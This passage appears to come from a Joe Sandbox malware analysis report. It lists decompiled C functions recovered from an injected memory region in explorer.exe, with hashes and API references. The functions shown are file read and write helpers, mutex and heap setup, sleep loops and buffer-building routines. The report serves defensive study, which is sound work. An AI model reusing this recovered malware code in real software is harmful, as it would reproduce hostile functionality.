						_v8 = _v8 + 1;
						continue;
					}
					break;
				}
				return _v12;
			}

0x01514f36
0x01514f3d
0x01514f4f
0x01514f6f
0x01514f74
0x01514f77
0x01514f7e
0x01514f9a
0x01514f4c
0x00000000
0x01514f4c
0x00000000
0x01514f7e
0x01514fac

APIs

SleepEx.KERNEL32(-00000001,00000001), ref: 01514F9A

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: f49904610b9c3654a5767f7815f032617076eac012e66dd8c3a5b10fe42181c8
Instruction ID: ade2024f6ccba71f41c7b3402c2e11b6d97bd55ddcdf576eb035811bf1fb33d5
Opcode Fuzzy Hash: f49904610b9c3654a5767f7815f032617076eac012e66dd8c3a5b10fe42181c8
Instruction Fuzzy Hash: E4018C71A00109EFEB01CF98C988B9EB7F5BF88304F208488F819AB348D335EE508B50

Uniqueness

Uniqueness Score: 0.90%

Function 01518E50, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01518E50(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				struct _OVERLAPPED* _v8;
				struct _OVERLAPPED* _v12;
				long _v16;
				int _t21;

				_v12 = 0;
				_v8 = 0;
				if(_a12 != 0) {
					if(_a12 >= 0) {
						while(1) {
							_v16 = 0;
							_t21 = WriteFile(_a4, _a8 + _v12, _a12 - _v12,  &_v16, 0); // executed
							_v8 = _t21;
							if(_v8 == 0) {
								break;
							}
							_v12 = _v12 + _v16;
							if(_v12 < _a12) {
								continue;
							}
							return 1;
						}
						return 0;
					}
					return 0;
				}
				return 1;
			}

0x01518e56
0x01518e5d
0x01518e68
0x01518e75
0x01518e7b
0x01518e7b
0x01518e9a
0x01518ea0
0x01518ea7
0x00000000
0x00000000
0x01518eb3
0x01518ebc
0x00000000
0x00000000
0x00000000
0x01518ebe
0x00000000
0x01518ea9
0x00000000
0x01518e77
0x00000000

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0111f02ad55f696b053df1a301b654602c04e698305da9e062ea6a66da18b4d
Instruction ID: 7dd3fac5ecae7e0910a0b8903a4dc502ea2296f04ec64cf55bac2b8794022893
Opcode Fuzzy Hash: e0111f02ad55f696b053df1a301b654602c04e698305da9e062ea6a66da18b4d
Instruction Fuzzy Hash: 7801DA74D0460CEFEF21DF98C884BDEBBB5FB48314F108A99E9159B248D3B49694CB94

Uniqueness

Uniqueness Score: 0.00%

Function 01518ED0, Relevance: 1.5, APIs: 1, Instructions: 40
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E01518ED0(void* _a4, intOrPtr _a8, intOrPtr _a12, struct _OVERLAPPED** _a16) {
				struct _OVERLAPPED* _v8;
				long _v12;
				int _t21;

				_v8 = 0;
				while(1 != 0) {
					_v12 = 0;
					_t21 = ReadFile(_a4, _a8 + _v8, _a12 - _v8,  &_v12, 0); // executed
					if(_t21 != 0) {
						if(_v12 != 0) {
							_v8 = _v8 + _v12;
							continue;
						}
						break;
					}
					return 0;
				}
				if(_a16 != 0) {
					 *_a16 = _v8;
				}
				return 1;
			}

0x01518ed6
0x01518edd
0x01518ee6
0x01518f05
0x01518f0d
0x01518f17
0x01518f21
0x00000000
0x01518f21
0x00000000
0x01518f19
0x00000000
0x01518f0f
0x01518f2a
0x01518f32
0x01518f32
0x00000000

APIs

ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01518F05

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7d8f5476c3c9cd8780ea7b9d62f3e70555f1926a9e2e932aab34f9c39c3424ac
Instruction ID: f79d5f804b0bd08ed72bab97e1157a3d40a2dd65dbf3bb6a287a0bd35c8cbd86
Opcode Fuzzy Hash: 7d8f5476c3c9cd8780ea7b9d62f3e70555f1926a9e2e932aab34f9c39c3424ac
Instruction Fuzzy Hash: FB018F34600208EFEB21CF98DA40B9E7BB5BB04304F104158E904AB348D334EA44CB50

Uniqueness

Uniqueness Score: 0.02%

Function 0151E900, Relevance: 1.5, APIs: 1, Instructions: 36
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E0151E900() {
				signed int _v8;
				struct _SYSTEM_INFO _v44;

				_v8 = 0;
				if( *0x1538b40 == 0) {
					GetSystemInfo( &_v44); // executed
					_v8 = _v44.dwOemId;
				} else {
					_v8 = 9;
				}
				if((_v8 & 0x0000ffff) != 9) {
					if((_v8 & 0x0000ffff) != 0) {
						while(0 != 0) {
						}
					} else {
						while(0 != 0) {
						}
					}
				} else {
					while(0 != 0) {
					}
				}
				return _v8;
			}

0x0151e908
0x0151e913
0x0151e924
0x0151e92e
0x0151e915
0x0151e91a
0x0151e91a
0x0151e939
0x0151e949
0x0151e953
0x0151e957
0x0151e94b
0x0151e94b
0x0151e94f
0x0151e951
0x0151e93b
0x0151e93b
0x0151e93f
0x0151e941
0x0151e960

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,0151EF01,?), ref: 0151E924

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 3ef659c9734ab6df88a38446fa80efe4efdde205bc60d6f9272aa0ee7da1ac4e
Instruction ID: 14d0fdaeb6116d47f029f58e71adbd4f0e7a589eba7a2f700dac69ddd1b81ec3
Opcode Fuzzy Hash: 3ef659c9734ab6df88a38446fa80efe4efdde205bc60d6f9272aa0ee7da1ac4e
Instruction Fuzzy Hash: 5FF0CD2890920AD1FBA7DAAA92122BC72B3FF04600F18884BDD166F20CF3304F42D342

Uniqueness

Uniqueness Score: 0.02%

Function 01518E10, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01518E10(void* __ecx, WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				void* _t7;

				_v8 = 0;
				_t7 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
				_v8 = _t7;
				if(_v8 != 0xffffffff) {
					return _v8;
				}
				return 0;
			}

0x01518e14
0x01518e2e
0x01518e34
0x01518e3b
0x00000000
0x01518e41
0x00000000

APIs

CreateFileW.KERNEL32(0151904D,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0151904D), ref: 01518E2E

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3d6b8f714a75d05d7588f54e398bd674c02028ed4e273d0ba275ab6ad2798086
Instruction ID: b71b518ee517f315e16816689c9aa52d5ae32ba720007664f50d563a21e97fb6
Opcode Fuzzy Hash: 3d6b8f714a75d05d7588f54e398bd674c02028ed4e273d0ba275ab6ad2798086
Instruction Fuzzy Hash: 12E0BF71A45308FBEB31CAA4DD45F9977A8A704714F204654BA15AB2C0D2B16E409654

Uniqueness

Uniqueness Score: 0.01%

Function 015157B0, Relevance: 1.5, APIs: 1, Instructions: 21
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E015157B0() {
				void* _t1;

				if( *0x153aae8 == 0) {
					_t1 = CreateMutexA(0, 0, 0); // executed
					 *0x153aae8 = _t1;
					if( *0x153aae8 != 0) {
						return 0;
					}
					while(0 != 0) {
					}
					return 0xffffffff;
				}
				return 0;
			}

0x015157ba
0x015157c6
0x015157cc
0x015157d8
0x00000000
0x015157e5
0x015157da
0x015157de
0x00000000
0x015157e0
0x00000000

APIs

CreateMutexA.KERNEL32(00000000,00000000,00000000,?,01515DB9,?,01515F23), ref: 015157C6

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 0cdfa491c3d7cf9fd7dfeff5c7c74b777db7d8ddce8a836d18df4abb8f494613
Instruction ID: 0dd62bf9f94320f675be13d38a5effe188c1895dfe313de13696d86ee47deb15
Opcode Fuzzy Hash: 0cdfa491c3d7cf9fd7dfeff5c7c74b777db7d8ddce8a836d18df4abb8f494613
Instruction Fuzzy Hash: 53E08C32238305CAF27686349D07B2636D0B386791F6009329226CF9C9F2F040C48750

Uniqueness

Uniqueness Score: 0.03%

Function 003F8C90, Relevance: 1.5, APIs: 1, Instructions: 21
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E003F8C90() {
				void* _t1;

				if( *0x411704 == 0) {
					_t1 = CreateMutexA(0, 0, 0); // executed
					 *0x411704 = _t1;
					if( *0x411704 != 0) {
						return 0;
					}
					while(0 != 0) {
					}
					return 0xffffffff;
				}
				return 0;
			}

0x003f8c9a
0x003f8ca6
0x003f8cac
0x003f8cb8
0x00000000
0x003f8cc5
0x003f8cba
0x003f8cbe
0x00000000
0x003f8cc0
0x00000000

APIs

CreateMutexA.KERNEL32(00000000,00000000,00000000,?,003F9299,?,003F926C), ref: 003F8CA6

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: b33ae762f1bb80ec6b955e147c9a2d4c144b809b47e774020848cf1f7ad111a3
Instruction ID: 1d5c26ddc12fda8030a1ea6fb834e0058340da0a242a430c5ed81b8bd1e161c2
Opcode Fuzzy Hash: b33ae762f1bb80ec6b955e147c9a2d4c144b809b47e774020848cf1f7ad111a3
Instruction Fuzzy Hash: D1E0C23025B74CC9D76A07B49E067B1B188E302B12F114531D327867F0DEB050008439

Uniqueness

Uniqueness Score: 0.03%

Function 0151BCA0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0151BCB1

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 49f46fe411b5fed7120f1bac8ef104737ffb73a6f87cc4ec0a25cc5cedf4055d
Instruction ID: 715dffb95a724292c615dc5116a2d91c64718b16d424ad5d8e037aa5f5a7a5fb
Opcode Fuzzy Hash: 49f46fe411b5fed7120f1bac8ef104737ffb73a6f87cc4ec0a25cc5cedf4055d
Instruction Fuzzy Hash: 04E0C276D0030EEBDF14CFA8D54459DBF74BF00220F20C6A9E8106B384EB305A40CB80

Uniqueness

Uniqueness Score: 0.01%

Function 01506EC1, Relevance: 1.5, APIs: 1, Instructions: 18
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01506EC1(void* __ecx) {
				signed int _t1;
				void* _t4;

				_t4 = __ecx;
				_t1 = CreateMutexA(0, 0, 0); // executed
				 *0x15379c4 = _t1;
				if(_t1 != 0) {
					_t1 = E01513960(_t4, 0x1000);
					 *0x15379c0 = _t1;
					if(_t1 == 0) {
						goto L1;
					} else {
						 *0x15379bc =  *0x15379bc & 0x00000000;
						return 0;
					}
				} else {
					L1:
					return _t1 | 0xffffffff;
				}
			}

0x01506ec1
0x01506ec7
0x01506ecd
0x01506ed4
0x01506edf
0x01506ee5
0x01506eec
0x00000000
0x01506eee
0x01506eee
0x01506ef7
0x01506ef7
0x01506ed6
0x01506ed6
0x01506ed9
0x01506ed9

APIs

CreateMutexA.KERNEL32(00000000,00000000,00000000,015065AC), ref: 01506EC7

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 48f462c59099d1c4f684597f942747331fe2dad5628c0a8ecdac40e62532ee0b
Instruction ID: 6fdb481b40239fa9f56b3d6615dc8bc6e345e38bd5ef7b40ecffa935322ad871
Opcode Fuzzy Hash: 48f462c59099d1c4f684597f942747331fe2dad5628c0a8ecdac40e62532ee0b
Instruction Fuzzy Hash: F9D017B2B467038AFB620A7CEC057153AA077487A2F114269E520CE3C8EBA0C004AA14

Uniqueness

Uniqueness Score: 0.03%

Function 0151E8D0, Relevance: 1.5, APIs: 1, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E0151E8D0(void* __ecx) {
				char _v8;

				_v8 = 0;
				if( *0x153a84c != 0) {
					 *0x153a84c(GetCurrentProcess(),  &_v8); // executed
				}
				return _v8;
			}

0x0151e8d4
0x0151e8e2
0x0151e8ef
0x0151e8ef
0x0151e8fb

APIs

GetCurrentProcess.KERNEL32(00000000), ref: 0151E8E8

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentProcess
String ID:
API String ID: 2050909247-0
Opcode ID: 5de098f16d6d9b85405b20b7116ae9f4d3dfb12573ffa2b6e384e47034f053a4
Instruction ID: 331fbfce3081315e9931698d9724984452106f80bd34ef2ad296307835f70b6f
Opcode Fuzzy Hash: 5de098f16d6d9b85405b20b7116ae9f4d3dfb12573ffa2b6e384e47034f053a4
Instruction Fuzzy Hash: C1D017B5804208EBEB20CBA4E40CB49B7ACE704301F014185E90487204C6385A18AB61

Uniqueness

Uniqueness Score: 0.43%

Function 0151BCE0, Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0151BCE0(void* __ecx, WCHAR* _a4) {
				long _v8;
				long _t7;

				_t7 = GetFileAttributesW(_a4); // executed
				_v8 = _t7;
				return 0 | _v8 != 0xffffffff;
			}

0x0151bce8
0x0151bcee
0x0151bcfd

APIs

GetFileAttributesW.KERNEL32(01515C49,?,?,01515C49,00000000), ref: 0151BCE8

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 425786ce5139d6343201ec036c69438517ab52548349ad5a1892e0e9bd8aef3b
Instruction ID: 5881ca8dad4276500e6e24b8b60f7faa5a311819b7a80fcdbc94b675c4d123e7
Opcode Fuzzy Hash: 425786ce5139d6343201ec036c69438517ab52548349ad5a1892e0e9bd8aef3b
Instruction Fuzzy Hash: D2D0127691530DEB8B20DFB4D80948D77ACD705331B114794F82CD3280E6359B549794

Uniqueness

Uniqueness Score: 0.01%

Function 01513940, Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01513940() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x1538850 = _t1;
				return _t1;
			}

0x0151394c
0x01513952
0x01513958

APIs

HeapCreate.KERNEL32(00000000,00080000,00000000,?,015066A1), ref: 0151394C

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 52304c3fb5c567a60b430cadfb577932429a4d3c9c223537bac28a8de317a998
Instruction ID: 687c188293d7ad9b504d4ce230522af5e1e703174a8fd2a2723d47aca387e7db
Opcode Fuzzy Hash: 52304c3fb5c567a60b430cadfb577932429a4d3c9c223537bac28a8de317a998
Instruction Fuzzy Hash: CBB092312883086BE2706A91BC07B007B98AB01B61F210515FA185EACAD7A120089B59

Uniqueness

Uniqueness Score: 0.02%

Function 0150631C, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0150631C() {
				void* _t4;
				void* _t5;

				while( *0x15379b4 == 0) {
					E0150629F(_t4, _t5, __eflags); // executed
					SleepEx(0x7530, 1); // executed
				}
				return 0;
			}

0x01506330
0x0150631e
0x0150632a
0x0150632a
0x0150633b

APIs

SleepEx.KERNEL32(00007530,00000001), ref: 0150632A

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: f8c5d74c381ab87dbed65fb20709fe288c6725e9356e2c10a826dc10039d91ed
Instruction ID: a3440933bf715358c252e8d1db7e89403b5f6eb9563f798199a3411615b31300
Opcode Fuzzy Hash: f8c5d74c381ab87dbed65fb20709fe288c6725e9356e2c10a826dc10039d91ed
Instruction Fuzzy Hash: D8C08C7212120192E23216A458087D6328223A0702F000010E2088F0D8C7E400A8E678

Uniqueness

Uniqueness Score: 0.90%

Function 003F3EC0, Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E003F3EC0() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x40f6e0 = _t1;
				return _t1;
			}

0x003f3ecc
0x003f3ed2
0x003f3ed8

APIs

HeapCreate.KERNEL32(00000000,00080000,00000000,?,003F3298), ref: 003F3ECC

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: f4f56e0b2b7ece21f2d15a0009f5bad227d8c7fc228ef721718c066622198b60
Instruction ID: ad1f3b8b826e074d72f1d9e5095a0cfbba7827f7f3e257f69767b50d94f4152a
Opcode Fuzzy Hash: f4f56e0b2b7ece21f2d15a0009f5bad227d8c7fc228ef721718c066622198b60
Instruction Fuzzy Hash: 7AB092312887087BE660AB91AE06B093A98E300B51F200031F708696E096F220044BAD

Uniqueness

Uniqueness Score: 0.02%

Function 015182B0, Relevance: 1.5, APIs: 1, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E015182B0(signed int _a4) {
				signed int _v8;
				char _v276;
				int _v280;
				signed int _v284;
				void* _v288;
				char _v308;
				signed int _t72;
				signed int _t74;
				signed int _t77;
				void* _t91;
				signed int _t93;
				signed short _t100;
				signed int _t141;
				void* _t168;
				void* _t169;
				void* _t170;
				void* _t172;
				void* _t174;
				void* _t175;
				void* _t177;
				void* _t180;

				_v288 = 0xffffffff;
				_v284 = 0;
				_v280 = 0;
				_v8 = 0;
				_t72 = _a4;
				_t118 =  *(_t72 + 0x420) & 0x0000ffff;
				if(( *(_t72 + 0x420) & 0x0000ffff) != 0) {
					_t118 = _a4;
					_t141 =  *((intOrPtr*)(_a4 + 0x428)) + 0x14;
					__eflags = _t141;
					_v8 = _t141;
				} else {
					_v8 =  *((intOrPtr*)(_a4 + 0x428)) + 0x28;
				}
				_t74 = E01513960(_t118, _v8);
				_t169 = _t168 + 4;
				_v284 = _t74;
				if(_v284 != 0) {
					E01520D40( *((intOrPtr*)(_a4 + 0x424)),  *((intOrPtr*)(_a4 + 0x428)),  &_v308);
					_t170 = _t169 + 0xc;
					_t77 = _a4;
					__eflags =  *(_t77 + 0x420) & 0x0000ffff;
					if(( *(_t77 + 0x420) & 0x0000ffff) != 0) {
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								goto L20;
							}
						}
						while(1) {
							L20:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						E01513AC0(_v284, _v284,  &_v308, 0x14);
						__eflags = _v284 + 0x14;
						E01513AC0(_a4, _v284 + 0x14,  *((intOrPtr*)(_a4 + 0x424)),  *((intOrPtr*)(_a4 + 0x428)));
						_t172 = _t170 + 0x18;
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								goto L25;
							}
						}
						while(1) {
							L25:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						__eflags = _a4 + 0x400;
						E015202A0(_a4 + 0x400,  *(_a4 + 0x420) & 0x0000ffff,  &_v276);
						E01520390(_v284, _v8,  &_v276);
						_t174 = _t172 + 0x18;
						L28:
						asm("sbb edx, edx");
						_t91 = E01518DB0(_a4, _a4,  ~( ~( *(_a4 + 0x438) & 0x00000002)) + 1); // executed
						_t175 = _t174 + 8;
						_v288 = _t91;
						__eflags = _v288 - 0xffffffff;
						if(_v288 != 0xffffffff) {
							_t93 = E01518E50(_v288, _v284, _v8); // executed
							_t175 = _t175 + 0xc;
							__eflags = _t93;
							if(_t93 == 0) {
								_v280 = 0xfffffffd;
							}
							L34:
							__eflags = _v288 - 0xffffffff;
							if(_v288 != 0xffffffff) {
								CloseHandle(_v288); // executed
							}
							__eflags = _v284;
							if(_v284 != 0) {
								E01513990( &_v284, 0);
							}
							return _v280;
						} else {
							goto L29;
						}
						while(1) {
							L29:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_v280 = 0xfffffffe;
						goto L34;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					__eflags = _a4 + 0x400;
					_t100 = E015177B0(_a4 + 0x400, _a4 + 0x400, 0x14, 0x14);
					_t177 = _t170 + 0xc;
					 *(_a4 + 0x420) = _t100;
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					E01513AC0(_v284, _v284, _a4 + 0x400, 0x14);
					E01513AC0(_v284, _v284 + 0x14,  &_v308, 0x14);
					__eflags = _v284 + 0x28;
					E01513AC0( *((intOrPtr*)(_a4 + 0x424)), _v284 + 0x28,  *((intOrPtr*)(_a4 + 0x424)),  *((intOrPtr*)(_a4 + 0x428)));
					_t180 = _t177 + 0x24;
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					E015202A0(_a4 + 0x400,  *(_a4 + 0x420) & 0x0000ffff,  &_v276);
					__eflags = _v284 + 0x14;
					E01520390(_v284 + 0x14,  *((intOrPtr*)(_a4 + 0x428)) + 0x14,  &_v276);
					_t174 = _t180 + 0x18;
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					goto L28;
				} else {
					return _t74 | 0xffffffff;
				}
			}

0x015182b9
0x015182c3
0x015182cd
0x015182d7
0x015182de
0x015182e1
0x015182ea
0x015182fd
0x01518306
0x01518306
0x01518309
0x015182ec
0x015182f8
0x015182f8
0x01518310
0x01518315
0x01518318
0x01518325
0x0151834a
0x0151834f
0x01518352
0x0151835c
0x0151835e
0x01518445
0x01518445
0x01518447
0x00000000
0x00000000
0x01518449
0x0151844b
0x0151844b
0x0151844b
0x0151844d
0x00000000
0x00000000
0x0151844f
0x01518461
0x01518483
0x01518487
0x0151848c
0x0151848f
0x0151848f
0x01518491
0x00000000
0x00000000
0x01518493
0x01518495
0x01518495
0x01518495
0x01518497
0x00000000
0x00000000
0x01518499
0x015184b0
0x015184b6
0x015184d0
0x015184d5
0x015184d8
0x015184e6
0x015184f2
0x015184f7
0x015184fa
0x01518500
0x01518507
0x0151852d
0x01518532
0x01518535
0x01518537
0x01518539
0x01518539
0x01518543
0x01518543
0x0151854a
0x01518553
0x01518553
0x01518559
0x01518560
0x0151856b
0x01518570
0x00000000
0x00000000
0x00000000
0x00000000
0x01518509
0x01518509
0x01518509
0x0151850b
0x00000000
0x00000000
0x0151850d
0x0151850f
0x00000000
0x00000000
0x00000000
0x00000000
0x01518364
0x01518364
0x01518364
0x01518366
0x00000000
0x00000000
0x01518368
0x01518371
0x01518377
0x0151837c
0x01518382
0x01518389
0x01518389
0x0151838b
0x00000000
0x00000000
0x0151838d
0x015183a1
0x015183bc
0x015183de
0x015183e2
0x015183e7
0x015183ea
0x015183ea
0x015183ec
0x00000000
0x00000000
0x015183ee
0x0151840c
0x0151842e
0x01518432
0x01518437
0x0151843a
0x0151843a
0x0151843c
0x00000000
0x00000000
0x0151843e
0x00000000
0x01518327
0x00000000
0x01518327

APIs

CloseHandle.KERNEL32(000000FF), ref: 01518553

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 1e43287e1cab7abc7e315195382595ce37f5f66a13f88c21393b4bab9f8bc044
Instruction ID: efdf8c917aac049c6f7f3ec12ffa7cc58894effd39aef9787eeff3b2eb37c084
Opcode Fuzzy Hash: 1e43287e1cab7abc7e315195382595ce37f5f66a13f88c21393b4bab9f8bc044
Instruction Fuzzy Hash: E881B7B1A001099BDB65CF18CC41BED77B5BF88318F1885A8F7099F285EA30DA81CBD5

Uniqueness

Uniqueness Score: 0.03%

Function 015095A2, Relevance: 1.4, APIs: 1, Instructions: 141
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E015095A2(void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44) {
				char _v8;
				char _v12;
				char _v16;
				CHAR* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v80;
				char _v480;
				CHAR* _t58;
				intOrPtr _t60;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t73;
				void* _t78;
				void* _t90;
				CHAR* _t92;
				void* _t94;
				void* _t95;
				void* _t96;

				_t90 = __edx;
				_t78 = __ecx;
				_t92 = 0;
				_v20 = 0;
				_v12 = 0;
				_v32 = 0;
				_v8 = 0;
				_v16 = 0;
				_v24 = 0;
				_v36 = 0;
				_v28 = 0;
				E01516AF0(__eflags,  &_v80, 0x1e, 0x28, 0x15394fc);
				_t58 = E01508ED0( &_v80, _a16, _a20, _a24, _a28, _a32, E01520E00(_t78), _a36,  &_v80);
				_t95 = _t94 + 0x30;
				_v20 = _t58;
				if(_t58 != 0) {
					_t60 = E01508AEC( &_v12, __eflags, _v20, lstrlenA(_t58), _a4,  &_v12,  &_v8, _a40); // executed
					_t96 = _t95 + 0x18;
					__eflags = _t60;
					if(_t60 != 0) {
						__eflags = _v8;
						if(_v8 == 0) {
							L14:
							_push(0xfffffffd);
							L15:
							_pop(_t92);
							L16:
							E01513990( &_v20, 0xffffffff);
							E01513990( &_v12, 0xffffffff);
							E01513990( &_v32, 0xffffffff);
							return _t92;
						}
						__eflags = E0151C270(_v12, _v8);
						if(__eflags == 0) {
							goto L14;
						}
						_t69 = E01508A83(__eflags, _v12);
						_v32 = _t69;
						__eflags = _t69;
						if(_t69 != 0) {
							_v8 = 0;
							_t70 = E01508CF2(__edi, _t69,  &_v16,  &_v24,  &_v28,  &_v36,  &_v480);
							_t96 = _t96 + 0x18;
							__eflags = _t70;
							if(_t70 >= 0) {
								_t73 = E01508BC1( &_v480, _v16,  &_v80, _v24);
								_t96 = _t96 + 0x10;
								__eflags = _t73;
								if(_t73 != 0) {
									__eflags = _v16;
									if(__eflags != 0) {
										_t92 = 1;
										E01509554( &_v16, _t90, __eflags, _a4, _a16, _a20, _v16, _a44(_a8, _a12, 1, _v24, _v28, _v36,  &_v8), _v8, _a40); // executed
										_t96 = _t96 + 0x38;
									}
									goto L16;
								}
								_push(0xfffffffa);
								goto L15;
							}
							_push(0xfffffffb);
							goto L15;
						}
						_push(0xfffffff9);
						goto L15;
					}
					_push(0xfffffffe);
					goto L15;
				}
				return _t58 | 0xffffffff;
			}

0x015095a2
0x015095a2
0x015095ac
0x015095bb
0x015095be
0x015095c1
0x015095c4
0x015095c7
0x015095ca
0x015095cd
0x015095d0
0x015095d3
0x015095f4
0x015095f9
0x015095fc
0x01509601
0x01509624
0x01509629
0x0150962c
0x0150962e
0x01509637
0x0150963a
0x015096f4
0x015096f4
0x015096f6
0x015096f6
0x015096f7
0x015096fd
0x01509708
0x01509713
0x00000000
0x0150971b
0x0150964d
0x0150964f
0x00000000
0x00000000
0x01509658
0x0150965e
0x01509661
0x01509663
0x01509684
0x01509687
0x0150968c
0x0150968f
0x01509691
0x015096a8
0x015096ad
0x015096b0
0x015096b2
0x015096b8
0x015096bb
0x015096c9
0x015096ea
0x015096ef
